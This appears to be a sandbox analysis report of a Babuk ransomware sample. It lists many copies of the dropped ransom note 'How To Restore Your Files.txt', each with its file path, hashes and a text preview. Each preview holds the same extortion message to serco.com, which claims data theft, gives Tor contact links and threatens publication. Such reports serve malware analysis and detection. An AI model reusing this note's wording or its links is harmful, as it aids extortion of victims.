                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
